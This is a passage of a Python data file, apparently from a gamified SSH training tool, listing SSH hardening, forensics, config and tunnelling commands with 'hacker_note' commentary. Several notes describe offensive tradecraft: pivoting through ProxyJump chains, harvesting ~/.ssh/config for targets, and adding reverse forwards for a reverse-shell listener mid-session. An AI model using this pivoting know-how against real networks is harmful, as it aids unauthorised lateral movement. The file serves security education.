        "hacker_note": "Attackers restart sshd after modifying sshd_config to activate backdoor settings — and defenders restart it after hardening; either way, monitor for unexpected sshd restarts in systemd logs as a tamper indicator.",
    },
    {
        "cmd": "grep -i 'PasswordAuthentication' /etc/ssh/sshd_config",
        "syntax": "grep -i 'PasswordAuthentication' /etc/ssh/sshd_config",
        "what": "Check if password login is enabled or disabled on the SSH server",
        "category": "harden", "level": 2, "boss": False,
        "aliases": [],
        "hacker_note": "This is the first thing a sysadmin checks after a brute force alert — if PasswordAuthentication is 'yes', every valid username is a potential target for password spraying across the internet.",
    },
    {
        "cmd": "sudo fail2ban-client status sshd",
        "syntax": "sudo fail2ban-client status sshd",
        "what": "Check how many IPs have been blocked for failed SSH attempts",
        "category": "harden", "level": 3, "boss": False,
        "aliases": [],
        "hacker_note": "Blue teamers check the banned IP list to profile attackers — geographic clustering of banned IPs, rapid ban cycling (IP changes every few attempts), or ASNs belonging to VPS/Tor exit nodes all signal a coordinated brute force campaign.",
    },
    {
        "cmd": "last",
        "syntax": "last",
        "what": "See who has logged in recently (and from which IP)",
        "category": "harden", "level": 1, "boss": False,
        "aliases": [],
        "hacker_note": "First command incident responders run — 'last' reads /var/log/wtmp and shows login history; a login from an unrecognized IP or at an odd time (3am UTC) is often the first visible sign of a breach.",
    },
    {
        "cmd": "who",
        "syntax": "who",
        "what": "See who is currently logged in",
        "category": "harden", "level": 1, "boss": False,
        "aliases": [],
        "hacker_note": "Running 'who' on a compromised server during active intrusion may show the attacker's own terminal — if you see a second login from an IP you don't recognize, the attacker is live on the box right now.",
    },
    {
        "cmd": "sudo journalctl -u sshd -n 50",
        "syntax": "sudo journalctl -u sshd -n 50",
        "what": "Show the last 50 SSH server log lines — see auth failures and connections",
        "category": "harden", "level": 2, "boss": False,
        "aliases": [],
        "hacker_note": "The first stop in SSH forensics — look for 'Invalid user' (unknown username tried), 'Failed password' (password spray), and 'Accepted publickey' from unexpected IPs (key-based post-exploitation).",
    },
    {
        "cmd": "ss -tnp | grep ssh",
        "syntax": "ss -tnp | grep ssh",
        "what": "Show active SSH connections on this machine",
        "category": "harden", "level": 2, "boss": False,
        "aliases": ["netstat -tnp | grep ssh"],
        "hacker_note": "Blue teamers run this to find unexpected established SSH connections — an outbound connection from a server to an external IP on port 22 is a strong C2 reverse tunnel indicator (servers usually don't initiate SSH, they accept it).",
    },
    # ── HARDEN — NEW COMMANDS ────────────────────────────────────────────────
    {
        "cmd": "tail -f /var/log/auth.log | grep sshd",
        "syntax": "tail -f /var/log/auth.log | grep sshd",
        "what": "Watch SSH login attempts in real time as they hit the server",
        "category": "harden", "level": 2, "boss": True,
        "aliases": ["tail -f /var/log/secure | grep sshd"],
        "hacker_note": "Blue teamers run this live during an active brute force attack to watch the IP, username, and timing pattern — a slow and low attack (one attempt per minute from rotating IPs) is trying to stay below fail2ban's threshold and needs manual rate-limiting via iptables.",
    },
    {
        "cmd": "grep 'Failed password' /var/log/auth.log | awk '{print $11}' | sort | uniq -c | sort -rn | head -20",
        "syntax": "grep 'Failed password' /var/log/auth.log | awk '{print $11}' | sort | uniq -c | sort -rn | head -20",
        "what": "Count failed SSH login attempts per source IP — find the top attackers",
        "category": "harden", "level": 3, "boss": True,
        "aliases": [],
        "hacker_note": "Standard blue team triage command for brute force campaigns — an IP with 10,000 failures in the last hour is obvious noise, but 50 failures across 50 different usernames from one IP is a credential stuffing attack targeting valid accounts.",
    },
    {
        "cmd": "sudo iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --set --name SSH",
        "syntax": "sudo iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --set --name SSH && sudo iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --update --seconds 60 --hitcount 4 --name SSH -j DROP",
        "what": "Rate-limit SSH connections at the firewall — drop source IPs after 3 new connections in 60 seconds",
        "category": "harden", "level": 3, "boss": True,
        "aliases": [],
        "hacker_note": "This iptables rule kills brute force tools like Hydra and Medusa before they hit sshd — attackers respond with distributed low-and-slow campaigns using botnets to spread attempts across thousands of source IPs, each under the rate limit.",
    },
    {
        "cmd": "sudo iptables -A INPUT -p tcp --dport 22 -s <trusted_ip_range> -j ACCEPT && sudo iptables -A INPUT -p tcp --dport 22 -j DROP",
        "syntax": "sudo iptables -A INPUT -p tcp --dport 22 -s 192.168.1.0/24 -j ACCEPT && sudo iptables -A INPUT -p tcp --dport 22 -j DROP",
        "what": "Whitelist SSH access to a specific IP range and drop everything else",
        "category": "harden", "level": 3, "boss": True,
        "aliases": [],
        "hacker_note": "The most effective brute force mitigation — if only your home or office IP can reach port 22, all internet-facing attack tools become irrelevant; attackers counter this by first compromising something inside the trusted range.",
    },
    {
        "cmd": "ssh-keygen -lf /etc/ssh/ssh_host_ed25519_key.pub",
        "syntax": "ssh-keygen -lf /etc/ssh/ssh_host_ed25519_key.pub",
        "what": "Display the fingerprint of the server's host key — verify before trusting a new server",
        "category": "harden", "level": 2, "boss": False,
        "aliases": [],
        "hacker_note": "The correct procedure before accepting a new host key is to get the fingerprint from the server owner out-of-band (phone/Signal/ticket) and compare it here — skipping this step is how MITM attacks succeed during the first connection.",
    },
    {
        "cmd": "grep -r 'AllowUsers\\|AllowGroups\\|DenyUsers\\|DenyGroups' /etc/ssh/sshd_config",
        "syntax": "grep -r 'AllowUsers\\|AllowGroups\\|DenyUsers\\|DenyGroups' /etc/ssh/sshd_config",
        "what": "Check which users and groups are allowed or blocked from SSH access",
        "category": "harden", "level": 2, "boss": False,
        "aliases": [],
        "hacker_note": "Attackers who gain root access often add themselves to AllowUsers or remove DenyUsers entries in sshd_config to ensure their newly created backdoor account can actually log in — check this during post-breach hardening.",
    },
    {
        "cmd": "sudo sshd -t",
        "syntax": "sudo sshd -t",
        "what": "Test sshd config for syntax errors without restarting the server",
        "category": "harden", "level": 2, "boss": False,
        "aliases": [],
        "hacker_note": "Always run 'sshd -t' before 'systemctl restart sshd' — a config syntax error in sshd_config causes sshd to fail to start, locking you out of the server permanently if you're working remotely with no out-of-band console access.",
    },
    # ── SSH CONFIG ────────────────────────────────────────────────────────────
    {
        "cmd": "Host <alias>\\n  HostName <ip>\\n  User <user>\\n  Port <port>\\n  IdentityFile <keyfile>",
        "syntax": "Host raspi\\n  HostName 192.168.1.100\\n  User pi\\n  Port 22\\n  IdentityFile ~/.ssh/id_ed25519",
        "what": "Add a Host block to ~/.ssh/config — lets you type 'ssh raspi' instead of the full command",
        "category": "connect", "level": 2, "boss": False,
        "aliases": [],
        "hacker_note": "Attackers dump ~/.ssh/config during post-exploitation because each Host block is a pre-configured pivot target — hostname, user, port, and key are all spelled out, giving a complete map of where the victim SSHs regularly.",
    },
    {
        "cmd": "Host <jumphost_alias>\\n  HostName <jumpip>\\n  User <jumpuser>\\nHost <target_alias>\\n  HostName <targetip>\\n  User <targetuser>\\n  ProxyJump <jumphost_alias>",
        "syntax": "Host bastion\\n  HostName 203.0.113.10\\n  User ec2-user\\nHost internal\\n  HostName 10.0.1.50\\n  User admin\\n  ProxyJump bastion",
        "what": "ssh_config ProxyJump chain — 'ssh internal' automatically hops through the bastion",
        "category": "connect", "level": 3, "boss": True,
        "aliases": [],
        "hacker_note": "Red teamers configure ~/.ssh/config with ProxyJump chains mirroring the target network topology — a single 'ssh prod-db' command then transparently pivots through two jump hosts to reach a deep internal database server.",
    },
    # ── ESCAPE SEQUENCES ─────────────────────────────────────────────────────
    {
        "cmd": "~.",
        "syntax": "~.",
        "what": "SSH escape sequence — immediately kill a stuck or frozen SSH session",
        "category": "manage", "level": 2, "boss": False,
        "aliases": [],
        "hacker_note": "When a remote host crashes mid-session and the terminal hangs, ~. is the only way out — it works even when Ctrl+C and Ctrl+Z do nothing, which matters during a live incident when you need to switch to another terminal fast.",
    },
    {
        "cmd": "~#",
        "syntax": "~#",
        "what": "SSH escape sequence — list all open port forwards and tunnels in the current session",
        "category": "tunnels", "level": 3, "boss": False,
        "aliases": [],
        "hacker_note": "Useful mid-op to audit exactly which tunnels are active without opening a new window — shows local and remote forwards by number, helping red teamers track their tunnel inventory in complex multi-pivot scenarios.",
    },
    {
        "cmd": "~C",
        "syntax": "~C",
        "what": "SSH escape sequence — open the SSH command line to add tunnels to a live session",
        "category": "tunnels", "level": 3, "boss": True,
        "aliases": [],
        "hacker_note": "Game-changer for red teamers: ~C followed by '-L 8080:localhost:80' adds a new local port forward to an already-established session without reconnecting — critical when you need to pivot to a newly-discovered internal service without dropping your existing shell.",
    },
    {
        "cmd": "~C -L <localport>:localhost:<remoteport>",
        "syntax": "~C\\n-L 8443:localhost:443",
        "what": "Add a new local tunnel to an already-open SSH session (no reconnect needed)",
        "category": "tunnels", "level": 3, "boss": True,
        "aliases": [],
        "hacker_note": "The most powerful real-time pivoting trick in SSH — once you discover an internal HTTPS admin panel via recon, you add the forward to your existing session with ~C instead of starting a whole new authenticated connection.",
    },
    {
        "cmd": "~C -R <remoteport>:localhost:<localport>",
        "syntax": "~C\\n-R 4444:localhost:4444",
        "what": "Add a new reverse tunnel to an already-open SSH session on the fly",
        "category": "tunnels", "level": 3, "boss": True,
        "aliases": [],
        "hacker_note": "Pen testers use this mid-engagement when they realize they need a reverse shell listener exposed on the target network — add the reverse forward without disconnecting and losing their foothold.",
    },
]


def by_category(cat: str) -> List[Dict]:
    return [c for c in COMMANDS if c["category"] == cat]


def by_level(lvl: int) -> List[Dict]:
    return [c for c in COMMANDS if c["level"] == lvl]


def boss_eligible() -> List[Dict]:
    return [c for c in COMMANDS if c["boss"]]


def get_by_cmd(cmd_text: str) -> List[Dict]:
    """Find commands matching an exact cmd or alias (case-insensitive prefix match)."""
    needle = cmd_text.strip().lower()
    return [
        c for c in COMMANDS
        if c["cmd"].lower().startswith(needle)
        or any(a.lower().startswith(needle) for a in c["aliases"])
    ]
